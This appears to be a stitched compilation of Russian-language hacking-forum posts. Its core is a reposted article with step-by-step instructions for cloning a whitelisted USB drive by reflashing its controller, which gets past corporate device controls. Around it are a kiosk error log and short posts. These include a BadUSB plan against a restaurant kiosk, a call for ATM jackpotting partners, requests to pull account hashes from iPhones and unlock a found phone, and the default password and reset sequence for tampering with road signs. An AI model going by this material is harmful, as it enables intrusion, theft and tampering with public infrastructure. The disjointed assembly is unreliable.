16:34:51 Переход на страницу ошибки.
16:34:51 Формирование запроса на чтение комиссий провайдеров.
16:34:51 Исходный размер 365 байт, cжатый размер 245 байт. Отправлен запрос серверу...
16:34:51 [transition] -> C:\Users\***\Downloads\1\site\error_html_ru.html
16:34:51 Включение блокировки правой кнопки мыши.
16:34:51 [iresp] ff.SupportPhone : Тел.:
16:34:53 Error: SSL certificate problem: unable to get local issuer certificate
16:34:53 Сертификат клиента не может быть аутентифицирован известными СА сертификатами.
16:34:53 Проверка SSL соединения
16:34:53 Проверка сертификатов (11856)
16:34:53 Cервер "unknown", получено 0 байт. Ошибка соединения по сети интернет: 60.
16:34:54 Error: SSL certificate problem: unable to get local issuer certificate
16:34:54 Ошибка проверки SSL соединения Сертификат клиента не может быть аутентифицирован известными СА сертификатами.
16:34:55 Error: SSL certificate problem: unable to get local issuer certificate
16:34:55 Ошибка при проверке сертификатов
16:35:11 Закрытие по команде пользователя(Alt-F4). Будет запущен explorer.
16:35:11 InfoTransaction.onStop
16:35:11 Завершение службы синхронизации времени.
16:35:11 Остановка менеджера сообщений.
16:35:11 Сохранение конфигурации.
16:35:11 Завершение программы.
16:35:11 Запуск стандартного shell.

Чтобы взломать чужую сеть, можно применить изощренные высокотехнологичные методы, а можно просто подбросить сотрудникам интересующей хакера компании флешку с «сюрпризом». В последние годы популярность этого способа понемногу падает, но он еще встречается [для проникновения в технологические сети промышленных предприятий](https://radiflow.com/wp- content/uploads/2019/06/Survey_ICS-2019_Radiflow.pdf). А какие существуют методы защиты от вредоносных флешек и как их можно обойти? Сейчас разберемся!
В этой статье мы рассмотрим, как устроена защита USB (Mass Storage Class — Removable Media) и как обмануть системы ограничения по белому списку устройств с помощью создания клонов. Звучит интересно? Хочешь натянуть современные средства защиты? Тогда добро пожаловать в мир увлекательных экспериментов!

КАК БЛОКИРУЮТ ФЛЕШКИ​

Зачем их блокировать? Чтобы ты не занес в ИТ‑инфраструктуру компании вирус‑шифровальщик, не таскал информацию домой и не приносил игрушки в офис. В разных конторах админы и безопасники действуют по‑разному. В самых печальных случаях порты физически отключаются, заливаются эпоксидкой или опечатываются. В случаях попроще порты отключаются через BIOS/UEFI (что‑то вроде USB Controller = Disabled).

Если админам ~~лень~~ жалко ломать железку, на помощь приходят настройки реестра и групповые политики винды. Например, для полной блокировки USB- носителей открой вот эту ветку реестра:

Code:Copy to clipboard

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

Если ты выставишь у параметра Start значение 4, твои флешки перестанут подключаться. В групповых политиках (gpedit.msc) обычно смотрят в сторону оснастки «Конфигурации компьютера → Административные шаблоны → Система → Доступ к съемным запоминающим устройствам».

Расположение на винде политики, связанной со съемными носителями

Существуют ли способы более изысканно и красиво ограничить подключение нежелательных носителей к компу? Компании побогаче используют дополнительные средства защиты информации (СЗИ) — тот же KAV (и иные антивирусы), DLP- системы, Secret Net (СЗИ от НСД) и прочие. Кто‑то даже устанавливает драйвер для проверки носителя по белому списку, кто‑то проверяет устройство в момент его монтирования.

Настройки СЗИ могут запретить подключение вообще всех устройств, только устройств из черного списка или разрешить подключение девайсов из белого списка. На последнем варианте мы с тобой и остановимся поподробнее.

А КАК ИХ РАЗЛИЧАЮТ?​

Как отличить одну флешку от другой? Понятное дело, что у флешек есть производитель, объем, другие параметры... Но обычно производители снабжают каждую флешку уникальным серийным номером, прописанным в ее прошивке.

Чтобы посмотреть его в винде, можешь использовать такую команду Windows Management Instrumentation — WMIC (предварительно подключив флешку):

Code:Copy to clipboard

wmic path win32_usbhub Where (Caption="Запоминающее устройство для USB") get DeviceID

Получаем примерно такой вывод команды:

Code:Copy to clipboard

DeviceID
USB\VID_13FE&PID_4200\070867948D560839

Полученный DeviceID содержит:

• VID — Vendor ID, идентификатор производителя. 13FE — Kingston Technology Company Inc.;
• PID — Product ID, идентификатор изделия. 4200 — Platinum USB drive mini;
• Serial — уникальный серийный номер флешки 070867948D560839.

VID и PID используются операционкой для поиска дров. Полный список можно посмотреть, например, на сайте Linux USB.

По DeviceID флешка прописывается в реестре:

Code:Copy to clipboard

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB\VID_13FE&PID_4200\070867948D560839

Также ты можешь получить всю эту информацию с помощью программы USBDeview.

Пример вывода программы USBDeview

В некоторых, особо изысканных и нездоровых случаях в качестве идентификатора флешки применяется Volume Serial Number (VSN, он же так называемый серийный номер тома), который можно получить командой vol или dir.
Вывод команд vol и dir

Почему использовать VSN (в Linux он называется UUID) для идентификации флешек — идея не очень? Дело в том, что данные метки идентифицируют логические тома файловой системы. Чтобы изменить VSN случайным образом, достаточно отформатировать раздел. Понятно, что для жестких дисков это процедура сравнительно редкая, но флешки форматируют довольно‑таки часто.

Что делать с ноунеймом​

Для китайских noname-флешек, производители которых «кладут» на соответствие девайса всевозможным рекомендациям и стандартам, такой серийник будет меняться в зависимости от USB-порта, в который ты подключил устройство, и, разумеется, положения звезд на небе. Если твою флешку безопасники пропишут в белый список только на одном порте, то на другом ты ее использовать не сможешь.
Вот пример такой флешки:

Code:Copy to clipboard

DeviceID=USB\VID_23A9&PID_EF18\6&45CEA456&0&2

Первое, что бросается в глаза, — серийник содержит несколько амперсандов. На самом деле у этой флешки нет серийника вообще. Когда & — второй символ серийного номера, это означает, что система каждый раз при подключении генерирует псевдосерийник сама, то есть он динамический. Проверим это, просто подключив флешку в другой порт:

Code:Copy to clipboard

DeviceID USB\VID_23A9&PID_EF18\6&45CEA456&0&1

Как ты видишь, при изменении порта в серийнике меняется номер этого порта (&2 в конце превратилось в &1). Так что нужно или добавлять в список номер такой флешки на всех портах, или использовать только выделенный порт для ее подключения.

В некоторых СЗИ используют иные свойства флешек. Все доступные свойства ты можешь просмотреть, щелкнув на значке флешки правой клавишей мыши и выбрав в контекстном меню «Свойства → Оборудование → Сведения». В выпадающем списке наиболее полезные сведения содержатся в строках «Понятное имя», «Путь к экземпляру устройства» и «Родитель» (тот же DeviceID).

Свойства устройства → Путь к экземпляру устройства

У китайских флешек эти параметры меняются, как генератор случайных чисел. Например, путь к экземпляру устройства для первого и второго USB-порта выглядит так:

Code:Copy to clipboard

USBSTOR\DISK&VEN_AI&PROD_MASS_STORAGE&REV_\7&6266D645&0
USBSTOR\DISK&VEN_AI&PROD_MASS_STORAGE&REV_\7&977ABD2&0

Для нормальной флешки здорового человека данный идентификатор стабилен:

Code:Copy to clipboard

USBSTOR\DISK&VEN_JETFLASH&PROD_TRANSCEND_8GB&REV_1100\BBPIX7EB2VMBFI48&0

Здесь:

• JETFLASH — производитель;
• TRANSCEND_8GB — название устройства;
• 1100 — номер ревизии;
• BBPIX7EB2VMBFI48 — серийный номер.

У разных флешек из одной партии меняться будет только серийник.

КАК ПАЛЯТ?​

Давай посмотрим, какими способами админы могут выявить, что к системе подключили флешку. В Windows имеется целый пул средств для отслеживания подключаемых носителей. Если хочешь поковыряться сам — смотри вот эти две ветки реестра:

Code:Copy to clipboard

HKLM\SYSTEM\CurrentControlSet\Enum\USB
HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR

Там хранится список идентификаторов подключаемых устройств, при этом информация в этих ветвях реестра не затирается стандартными процедурами в планировщике задач винды, то есть данные хранятся сколь угодно долго.

Если ты предпочитаешь готовые решения, то к твоим услугам классический USBLogView, который в реальном времени регистрирует подключение и отключение флешки. В форензике для комплексного анализа подключений рекомендуем посмотреть в сторону USB Detective и USB Forensic Tracker.

USB Detective извлекает информацию из реестра, логов, иных источников, а также может снимать информацию с Live-системы (в версии Pro), при этом выполняя корреляцию и верификацию данных.

USB Forensic Tracker извлекает все артефакты подключений независимо, поэтому для каждого источника данных ты имеешь свою таблицу подключений USB-устройств (корреляции, к сожалению, он не делает).

Пример вывода программы USB Forensic Tracker

Например, просматривая данные по нашей китайской флешке, мы выяснили, что ее отображаемый серийник на первом порте — 388e987, на втором — 3с69e2с9. После форматирования они стали 4247e754 и 966cde2 соответственно.

Во внешних СЗИ имеются функции просмотра и блокирования подключенных флешек в реальном времени или на основе ранее подключенных устройств.

ПРАКТИЧЕСКИЙ ПОДХОД К СБИТИЮ ПАРАМЕТРОВ ФЛЕШЕК​

Часть 1. VSN (UUID)​

Если тебе повезло и в твоей организации блокируют флешки через VSN/UUID, то существует масса годных вариантов. Все представленные ниже кейсы не изменяют основные параметры флешки, такие как серийный номер и информация о модели. Однако помни, что иногда VSN применяется при лицензировании ПО и изменение VSN может повлиять на его работоспособность. Зато, научившись менять VSN, ты сможешь давать вторую жизнь лицензионным прогам, которые жалуются на смену жестких дисков и не хотят работать.

Манипуляции представлены для демонстрации. Применяя их, будь осторожен и внимателен, поскольку при некорректном подборе команд, программ, прошивок ты рискуешь окирпичить флешку, за что мы, конечно, ответственности не несем. Не стоит упоминать, что на тестируемых флешках не следует держать ценную инфу.

​

Вариант 1. Форматирование​

Данный вариант используется, когда активен только черный список флешек, поскольку форматирование меняет идентификатор раздела. Однако задать конкретный идентификатор в данном случае не получится.

Например, флешка с FAT32 до форматирования имеет VSN 4652-F858, а после быстрого форматирования — 76DA-6C78. Для NTFS ситуация в целом аналогична.

Как ты видишь, вариант предельно простой, но совершенно неконтролируемый. Это нам как‑то не очень подходит, попробуем менять параметры на избранные нами значения.

Вариант 2. Смена VSN через утилиты​

Существуют готовые утилиты для смены VSN, например VolumeID от компании Sysinternals или более приятная на вид графическая утилита [Volume Serial Number Changer](https://www.codeproject.com/Articles/5825/Changing- volume-s-serial-number). Во втором случае нужно просто запустить утилиту, выбрать метку диска, вбить новый идентификатор, нажать Change Serial number, вынуть‑вставить флешку, и все готово.

Работа с утилитой Volume Serial Number Changer и ее результат

Вариант 3. Сделай сам​

Ты хочешь полностью познать дзен флешек? Не вопрос. Предварительно определись с файловой системой. Открой любой HEX-редактор и перетащи туда значок флешки из проводника. Для FAT32 VSN находится по смещению 0x43, для NTFS — на 0x48.

Проверим это.

Исходный VSN устройства с файловой системой NTFS

Нашелся серийник 6666-6666. Что ж, исправим его и сохраним результат. Помни, что порядок чтения байтов — справа налево (little endian).

Измененный VSN устройства с файловой системой NTFS

Для FAT32 ситуация полностью аналогична.

Измененный VSN устройства с файловой системой FAT

Итак, теперь ты умеешь менять VSN (UUID). Но для по‑настоящему серьезных вещей и создания почти полноценного клона нужно еще немного углубиться в тему.

Часть 2. VID, PID, Serial​

Чтобы менять максимальное количество параметров, требуется перепрошить контроллер флешки. Процедура эта сравнительно несложная, но опасная — в случае ошибки ты рискуешь сделать флешку неработоспособной (однако ошибка чаще всего возникает при неудачном выборе прошивки или прошивальщика).

Представим, что у тебя есть исправная флешка (которая работает в офисе без проблем), а также ты приобрел другую флешку — потенциальный клон. Если ты купишь флешку точно той же модели, то при некоторых обстоятельствах сможешь обойти СЗИ, в которых идет проверка только по VID и PID.

На практике лучше найти флешки, которые легче всего перепрошивать, например фирмы Silicon Power или Transcend с USB 3.0 — в них часто используется SMI- контроллер. Хотя в целом тебе могут попасться флешки с контроллерами AlcorMP, Phison и другие. Для них тоже есть прошивки.

Общий алгоритм прошивки девайса следующий:

1. Выясни тип идентификатора, который используется для определения флешки в СЗИ, или используемые составляющие на основе данных флешки (опционально), запиши их для последующей подделки.
2. Определи контроллер флешки.
3. Подбери утилиту для прошивки, подходящую под конкретную версию контроллера.
4. В прошивальщике задай необходимые параметры, идентичные оригинальной флешке.
5. Прошей флешку‑клон и проверь ее работу. В случае неудачной прошивки — повтори шаги, начиная со второго. Если флешка окирпичилась, поступай аналогично.

Шаг 1. Так случилось, что на первой протестированной нами машине стоял антивирус Comodo с возможностью контроля устройств. Недолго думая, включаем блокировку для USB и добавляем флешку‑оригинал в исключение. Антивирь любезно показывает нам используемый идентификатор флешки.

Контроль устройств антивируса Comodo

В свойствах оборудования находим, что эта строка соответствует опции «Путь к экземпляру устройства». Запишем идентификатор как целевое значение, которому наша флешка‑фейк должна соответствовать:

Code:Copy to clipboard

USBSTOR\DISK&VEN_&PROD_USB_DISK_2.0&REV_PMAP\070867948D560839&0

На всякий случай запомним и DeviceID:

Code:Copy to clipboard

USB\VID_13FE&PID_4200\070867948D560839

Бывает, СЗИ напрямую не показывают идентификатор (угадай почему), а определяют только некоторые свойства подключенного устройства. В таких случаях идентификатор обычно складывается из видимых полей и свойств. Для нас это непринципиально, поскольку, подгоняя данные фейка под оригинал, мы задействуем те же самые данные и формируем такой же идентификатор.

Шаг 2. Для определения контроллера флешки‑фейка воспользуемся прогой ChipGenius (ее можно скачать с сайта USBDev. Кстати, рекомендуем сайт как наиболее полезный русскоязычный ресурс по прошивке флешек. Можно воспользоваться аналогом — Flash Drive Information Extractor. Интерфейс программ простой — вставил флешку, получил результат — см. иллюстрацию ниже.

Результат выполнения программ определения контроллера

Сравни с выводом ChipGenius для нашего будущего фейка:

• DeviceID
• USB\VID_090C&PID_1000\CCYYMMDDHHMMSS000000
• Description: [H:]Запоминающее устройство для USB(SMI USB DISK)
• Device Type: Mass Storage Device
• Protocal Version: USB 2.00
• Current Speed: High Speed
• Max Current: 500mA
• USB Device ID: VID = 090C PID = 1000
• Serial Number: CCYYMMDDHHMMSS000000
• Device Vendor: SMI Corporation
• Device Name: USB DISK
• Device Revision: 1100
• Manufacturer: SMI
• Product Model: USB DISK
• Product Revision: 1100
• Controller Vendor: SMI
• Controller Part-Number: SM3257ENBA - ISP 131128-AA-
• Flash ID code: 98DE8493 - KIOXIA TC58TEG6DCJBA00 - 1CE/Single Channel [MLC-16K] → Total Capacity = 8GB
• Tools on web: http://dl.mydigit.net/special/up/smi.html

Итак, мы видим, что у нас контроллер семейства SMI (Silicon Motion) с номером SM3257ENBA. Теперь найдем прошивальщик для него!

Шаг 3. Хотя ChipGenius даже дает ссылку для прошивальщика, на сайте по этой ссылке все на китайском, поэтому проще скачать его с UsbDev. При этом обязательно в версии, поддерживающей наш контроллер SM3257ENBA. Для данного контроллера используются прошивальщики SMI MPTool и Dyna Mass Storage Production Tool. Нам больше по душе вторая (работает долго, но качественно и почти со всеми подвидами данных контроллеров). Находим нужную версию, качаем Dyna Mass Storage Production Tool, вставляем флешку‑фейк, запускаем прогу.

Шаг 4. Не пугайся, не все так сложно. Все прошивальщики имеют практически идентичный набор параметров, поэтому общие принципы и изменяемые параметры у всех схожи, независимо от бренда и модели контроллера. Убедись, что флешка появилась в программе.

Обнаружение флешки в Dyna Mass Storage Production Tool

В правой части жми надпись Settings, ввод пароля пропускаем нажатием Enter (в некоторых утилитах он тоже есть, обычно легко гуглится на форумах), в качестве дефолтного конфига указываем файл в корне каталога прошивальщика — NDefault.INI.

Кстати, все эти операции могут восстановить твой любимый неисправный USB- гаджет путем перепрошивки с дефолтными значениями, главное — не накосячить с определением программы и контроллера. Ну а мы продолжаем. В появившемся окне переходим на вкладку DeviceConfig.

Исходные параметры флешки в Dyna Mass Storage Production Tool

Менять здесь нужно совсем немного. В поле SN Method выбираем Static SN (иначе наш серийник будет пустой, как в noname-флешках). В данном случае мы задаем стойкий, как швейцарский банк, серийник, который не будет меняться от системы к системе.

В секции USB чуть ниже выставляем параметры, как у флешки‑оригинала:

Code:Copy to clipboard

VID → 13FE, PID → 4200, bdcDevice (номер ревизии) → PMAP

Имя производителя и продукта в нашем кейсе не используется, можем не менять. Однако в некоторых мажорных СЗИ они также применяются для формирования сигнатуры устройства. Если ты вообще не знаешь, какие параметры и куда вводить, то рекомендуем повторить шаги с первого и вот до этого места на флешке‑оригинале, скопировать все параметры в прошивальщик флешки‑фейка и продолжить чтение. Оригинал прошивать не нужно.

В поля SN Begin No., SN End No. и SN Mask забиваем серийник флешки‑оригинала: 070867948D560839.

Давай еще раз посмотрим на целевую строку:

Code:Copy to clipboard

USBSTOR\DISK&VEN_[пустой]&PROD_USB_DISK_2.0&REV_PMAP\070867948D560839&0

Мы уже перенесли номер ревизии (PMAP) и серийник — цифровую часть в конце.

В секции Inquiry очищаем поле Vendor, в поле Product прописываем USB DISK 2.0. VID и PID мы поменяли, чтобы серийный номер (Device ID) был также идентичен оригиналу. В правом верхнем углу жмем Save и в главном окне нажимаем Start. Начинается перепрошивка флешки.

Выставление параметров в Dyna Mass Storage Production Tool

В нашем случае глубокая перепрошивка занимает 35 минут. А при использовании SMI MPTool можно задействовать более быстрый способ перепрошивки, когда с контроллера считывается CID-регистр (Card Identification; открывается через меню Debug → Read CID\Write CID), в нем по аналогии с редактированием в HEX вручную прописываются нужные данные (но опять же нужно установить контрольные байты длины, не забывать вбивать значения справа налево и так далее, что неудобно).

Параметры флешки в программе SMI MPTool

Шаг 5. После успешной (мы надеемся) перепрошивки остается проверить нашу фейковую флешку и узнать, насколько она хороша. Посмотрим детали с помощью ChipGenius и выделим отличия от оригинала:

• Description: [H:]Запоминающее устройство для USB(USB DISK 2.0)
• Device Type: Mass Storage Device
• Protocal Version: USB 2.00
• Current Speed: High Speed
• Max Current: 500mA (у оригинала — 200 mA, можно поменять через свойство USB Power — см. позапрошлый скрин, но при занижении силы тока устройство может отказаться работать)
• USB Device ID: VID = 13FE PID = 4200
• Serial Number: 070867948D560839
• Device Vendor: SMI Corporation (у оригинала отсутствует, меняется через панель USB → Vendor String)
• Device Name: USB DISK (у оригинала USB DISK 2.0, меняется через панель USB → Product String)
• Device Revision: 4200 (у оригинала 0100, данный параметр не изменяется)
• Product Model: USB DISK 2.0
• Product Revision: PMAP
• ...(остальное по контроллеру и так различается)...

Теперь сравним DeviceID флешки‑оригинала, фейка до клонирования и фейка после прошивки.

Проверка изменений на флешке‑клоне

Открыв свойства оборудования, проверяем путь к экземпляру‑клону:

Code:Copy to clipboard

USBSTOR\DISK&VEN_&PROD_USB_DISK_2.0&REV_PMAP\070867948D560839&0

Целевой путь:

Code:Copy to clipboard

USBSTOR\DISK&VEN_&PROD_USB_DISK_2.0&REV_PMAP\070867948D560839&0

Теперь вставляем фейк в тестовую машину с включенным белым списком для флешки‑оригинала.

Отработка подключения флешки антивирусом Comodo

Сработало! Флешка открывается и работает. Пробуем подключить оригинальную флешку вместе с фейком — облом, происходит конфликт, поэтому работает только первая воткнутая флешка. Так что подключай их по одной.

Для полного соответствия копии оригиналу рекомендуем изменить остальные параметры, отформатировать фейк, дать ему метку оригинала. И не забудь изменить VSN — как это сделать, ты уже знаешь.

Давай проверим фейк на надежном антивирусе — например, Kaspersky Endpoint Security 10.

Интерфейс контроля устройств Kaspersky Endpoint Security 10

Смотрим, что используется в качестве идентификатора флешки‑оригинала.

Идентификатор флешки в Kaspersky Endpoint Security 10

Это путь к экземпляру устройства, добавляем его в белый список, проверяем на какой‑нибудь левой флешке.

Сообщение о блокировке в Kaspersky Endpoint Security 10

И вот тут мы словили хохму — флешка отображается в проводнике (особенность «Кошмарского»), проверяется антивирусом, но при попытке обратиться к ней получаем вот такое окно.

Сообщение об отказе доступа к флешке

Но флешка‑фейк предсказуемо работает без каких‑либо проблем.

Схожим образом мы протестировали ряд коммерческих DLP-систем, СЗИ под Linux и нигде не встретили ни отпора, ни попыток воспрепятствовать атаке клонов.

И тут статью можно было бы закончить, но...

Часть 3. Извращения​

Совершенно случайно оказалось, что в зависимости от СЗИ можно использовать и дополнительные методы обхода USB-блокировок.

Дискетко​

Путем форматирования флешку можно превратить в классическую дискету с возможностью чтения и записи, объемом всего в 1,38 Мбайт. Хватит, чтобы потихоньку перетащить на работу игрушку? Разве что по частям в несколько заходов. Вот как это сделать. Берем новую флешку, действуем по знакомому алгоритму. В этот раз нам попалась флешка Transcend 8 Gb USB 3.0 с контроллером SMI SM3267AB (возьмем прошивальщик для него — SMI MPTool V2.5.51 v7 P0920v1). Итак, прошивальщик, окно Settings, вкладка Multi-Lun Settings.

Форматирование флешки как дискеты

Устанавливаем галки на Floppy и форматировании, прошиваем. Результат выглядит примерно так.


Прошивка флешки в роль дискеты

Floppy-дисковод работает, зачет

Проверим на Каспере. По‑прежнему блокируется USB для любых флешек, кроме доверенных, но «дисковод» успешно подключается, можно читать‑писать информацию. Доступа к флешечному разделу по‑прежнему не предвидится.

Если сравнивать информацию о Floppy в Касперском с информацией по USB, то разница заключается только в типе устройства (Дискеты vs Съемные диски).

При включении блокировки дискет данный метод, конечно, не сработает.


​

CD-привод​

Аналогичный подход, но теперь попробуем создать на флешке CD-раздел и предварительно записать на него образ из ISO-файла. Недостаток очевиден — можно только считывать инфу с CD-раздела, записать на флешку файлы ты уже не сможешь. Но запустить установщик любимой игрули — без проблем. Берем ту же самую флешку на контроллере SM3267AB и через SMI прошиваем CD-раздел. В разделе Multi-lun Setting выставляем галочку Static CDROM Size и указываем размер под твой ISO, который мы будем туда заливать.

Прошивка флешки в роль CD-привода

На вкладке Main Flow Setting около галки с Make Auto Run задаем путь к ISO- образу, например с Kali Linux — или чем‑нибудь другим. После прошивки флешка отображается в проводнике как отдельный флеш‑накопитель и CD-привод. С CD- раздела можно читать, копировать файлы — все как при классическом монтировании ISO-образа.

Что же на это скажут наши блокировщики? В Касперском и других коммерческих решениях ситуация полностью аналогична случаю с дискетами: CD-раздел успешно подключен и готов к использованию.

Покупка мутантов​

Есть, кстати, готовые флешки, которые содержат CD-раздел с утилитами для подключения «закрытого» раздела — как, например, в Jet Flash Transcend 620. Выглядит он примерно как CD-раздел с программулиной + 2 USB-раздела — открытый и пока закрытый, до ввода пароля. Размер приватной области настраивается.

Пример флешки‑мутанта

Интерфейс программы JetFlash SecureDrive

Так вот, при работе белого списка по USB-накопителям в Касперском (если CD- привод не заблокирован) такая флеха вполне себе монтирует CD-раздел — можно и запускать, и копировать проги с него. При попытке смонтировать защищенный раздел — отказ в доступе. Чтобы спастись от этой напасти, нужно заблокировать CD-привод, хотя в родителе устройства указан все тот же старый добрый USB- идентификатор, что странно. В Comodo возможность монтирования такого недоверенного носителя исключена в принципе. Почему? Вопрос к реализации СЗИ и механизмам организации белых списков.

ВЫВОД​

В статье мы рассмотрели варианты формирования максимально правдоподобного клона флешки, который позволяет обходить всевозможные блокировки. В зависимости от степени замороченности, можно обойти почти любой белый список. Как нам видится, для гарантированной защиты от подмены USB можно было бы указывать в СЗИ конкретные модели флешек и заносить в белый список хеш от CID области, от комбинации VID + PID + Serial или добавлять хеш вывода ChipGenius (ну либо его части). Неплохо было бы добавлять в идентификационную информацию данные о модели контроллера девайса.

В связи с тем что мы знаем парочку операционных систем, которые в качестве значений для белого списка используют название производителя или иные подобные параметры, было бы здорово на уровне ОС контролировать подключаемые носители на предмет их подмены или несоответствия обычному (ожидаемому) поведению (например, можно сравнивать VSN/UUID и ловить отличия при одинаковом DeviceID).

Безопасникам мы рекомендуем полностью блокировать подключение дискет и дисков в ОС, чтобы исключить описанные варианты обхода защиты. Будем рады получить обратную связь в комментариях. Может быть, у читателей найдутся прикольные решения для защиты от клонов или анализа аномалий при подключении устройств.

авторы:
boris-razor
alex-mess
хакер.ру

Всем привет, обедая в большом М заметил что один из киосков самообслуживания не работает, а ошибки на экране содержищие пути "C:\..." натолкнули на мысль что там стоит винда.
Поискал что за софт используется, из вариантов: provisio sitekiosk (по логотипу вроде он был) и win10 kiosk mode.
Из идей как загрузить туда пейлоад: если открыть отсек с принтером, то там будут io порты (проверял), можно провести badusb атаку.
Вопрос заключаетя в том как обойти программу контролирующую киоск и имеет ли он доступ в интернет?

Видел у нас в магазине диктофон, размером в пол коробка, запись на 9 часов,активен 160 часов, ожидание 2 года, активация с голоса,!Две кнопки, запись скидывается на комп через USB. Что ? Это? Такое?

В iOS есть функция «Live-прослушивание», с помощью которой можно прослушивать происходящее вокруг устройства через беспроводные наушники, например, находясь в другой комнате. В Android тоже можно реализовать подобную функцию, но с помощью сторонних приложений.

Одно из таких приложений — Ear Agent . Вам необходимо дать приложению доступ к микрофону, подключить к устройству беспроводные наушники. Как только вы активируете прослушивание, приложение начнёт в режиме реального времени транслировать весь окружающий звук на наушники, которые подключены к устройству.

Учтите, что приложение будет транслировать звук даже на встроенный динамик телефона, поэтому убедитесь в подключении наушников прежде, чем активировать эту функцию. Также вы можете воспользоваться эквалайзером, чтобы усилить или заглушить конкретную частоту, добившись оптимального звучания.

Киберпреступники взяли на вооружение так называемые "русские", "зашифрованные" или "белые" SIM-карты, позволяющие им менять телефонные номера и искажать голос звонящего. Об этом изданию Motherboard сообщил анонимный владелец сайта, занимающегося продажей таких "симок".

По словам продавца, предлагаемые им SIM-карты позволяют подделать любой номер по желанию, причем для каждого звонка можно устанавливать отдельный номер (в таком случае собеседник не сможет добавить звонящего в черный список). К примеру, с их помощью мошенники могут сделать так, будто звонят с номера телефона банка, или просто сгенерировать произвольный набор цифр, чтобы собеседник не смог определить настоящий номер звонящего. Настройка такой SIM- карты занимает секунды, а инструкции доступны online.

"Русские симки" отличаются по качеству и функционалу. Помимо спуфинга телефонных номеров некоторые из них также позволяют менять голос во время разговора, например, делать его более низким и грудным или, наоборот, высоким и визгливым. Некоторые карты имеют большее преимущество, так как являются "международными" и обеспечивают неограниченный объем данных.
Купить "русскую симку" можно анонимно, не предоставляя о себе никаких данных, заплатив биткойнами. "Это самые популярные SIM-карты в преступном мире", - сообщил один из источников Motherboard.

Большой популярностью у преступников пользуются так называемые зашифрованные мобильные устройства - кастомизированные смартфоны, у которых камера, микрофон и GPS были удалены. Часто производители таких устройств вместе со смартфоном предлагают своим покупателям и "русскую симку". - перепечатка новости с мазы, INC разместил.

Кто-то, что-нибудь об этом слышал? Или опять журналистский высер?

Ищу кто работал или ещё работает с атм jackpot i blackbox

чем можно вытащить хэш пароля из приложения вк на айфоне ? ios 14.3
тулзы от elcomsoft особо не помогли

xD забавный хак; и быстро!
** ТОЛЬКО ДЛЯ ИНФОРМАЦИОННЫХ ЦЕЛЕЙ **
Сколько раз вы ездили по таким электронным дорожным знакам, как один из этих?
Это переносная вывеска ADDCO. Сегодня вы увидите, что находится внутри, и как они запрограммированы для отображения важной информации.

*** ВНИМАНИЕ: НИКОГДА НЕ СЛЕДУЕТ ИСПОЛЬЗОВАТЬ ДАННЫЕ ЗНАКИ ***

Панель доступа на знаке обычно защищена небольшим замком, но часто остается незащищенной. Открыв панель доступа, вы увидите электронику дисплея.

Пульт управления чёрный крепится фигурным шнурком, клавиатура находится на лицевой стороне.

Программирование так же просто, как прокрутка пункта меню вниз до «Мгновенный текст». Введите все, что вы хотите отобразить, нажмите Enter, чтобы отправить. Теперь вы можете либо бросить его на знак, выбрав «Запустить без сохранения», либо добавить к нему дополнительные страницы, выбрав «Добавить страницу»

** НЕ ВВОДИТЕ ПАРОЛИ, КОТОРЫЕ НЕ ПРИНАДЛЕЖАЮТ ВАМ, НО ЕСЛИ ВЫ БЫЛИ ЛЮБОПЫТНЫМ ... ** Если он попросит вас ввести пароль. Попробуйте "DOTS", пароль по умолчанию.
По всей видимости, экипаж не стал его менять. Однако, если они это сделали, не бойтесь. Зажать «Control» и «Shift» и, удерживая, ввести «DIPY». Это сбросит знак и сбросит пароль на «ТОЧКИ» в процессе. Ты в!

// English users; xD funny hack; and quick!

FOR INFORMATIONAL PURPOSES ONLY
How many times have you driven by an electronic road sign like one of these?
This is the ADDCO portable sign. Today, you see what is on the inside, and how they are programmed to display important information.

*** WARNING YOU SHOULD NEVER TAMPER WITH THESE SIGNS ***

The access panel on the sign is generally protected by a small lock, but often are left unprotected. Upon opening the access panel you can see the display electronics.

The black control pad is attached by a curly cord, with a keyboard on the face.

Programming is as simple as scrolling down the menu selection to "Instant Text". Type whatever you want to display, Hit Enter to submit. You can now either throw it up on the sign by selecting "Run w/out save" or you can add more pages to it by selecting "Add page"

** DO NOT ENTER PASSWORDS THAT DONT BELONG TO YOU BUT IF YOU WERE CURIOUS... ** Should it will ask you for a password. Try "DOTS", the default password.
In all likelihood, the crew will not have changed it. However if they did, never fear. Hold "Control" and "Shift" and while holding, enter "DIPY". This will reset the sign and reset the password to "DOTS" in the process. You're in!

айфон отключён подключитесь к itunes. Собственно все что я вижу на экране. Телефон найденный. Как то могу решить вопрос? Дайте дельный совет. Если с работает способ, заплачу 1500. Сгласен на гаранта

[CLIKE]Я обнаружил уязвимость в Safari, которая давала доступ к вашей камере на iOS и MacOS несанкционированным веб-сайтам.

Представьте, что вы находитесь на популярном веб-сайте, когда внезапно рекламный баннер захватывает вашу камеру и микрофон, чтобы шпионить за вами. Это именно то, что позволила бы эта уязвимость.

Эта уязвимость позволяла вредоносным веб-сайтам маскироваться как надежные веб-сайты при просмотре в Desktop Safari (например, на компьютерах Mac) или Mobile Safari (например, на iPhone или iPad).

Затем хакеры могут использовать свою мошенническую личность для вторжения в личную жизнь пользователей. Это сработало, потому что Apple позволяет пользователям постоянно сохранять свои настройки безопасности для каждого веб- сайта.

Если злонамеренному веб-сайту требовался доступ к камере, все, что ему нужно было сделать, это выдать себя за надежный веб-сайт для видеоконференций, такой как Skype или Zoom.

Я разместил технические подробности того, как я нашел эту ошибку в длинном пошаговом руководстве здесь.

Мое исследование выявило семь уязвимостей нулевого дня в Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, и CVE- 2020-9787), три из которых были использованы в цепи уничтожения для доступа к камере.

Проще говоря - ошибка заставила Apple думать, что вредоносный сайт на самом деле является доверенным. Это было сделано путем использования ряда недостатков в том, как Safari анализирует URI, управляет веб- происхождением и инициализирует [безопасный контекст.](https://developer.mozilla.org/en- US/docs/Web/Security/Secure_Contexts)

Если вредоносный веб-сайт объединяет эти проблемы, он может использовать JavaScript для прямого доступа к веб-камере жертвы без запроса разрешения. Любой код JavaScript с возможностью создания всплывающего окна (например, отдельный веб-сайт, встроенный рекламный баннер или расширение браузера) может запустить эту атаку.

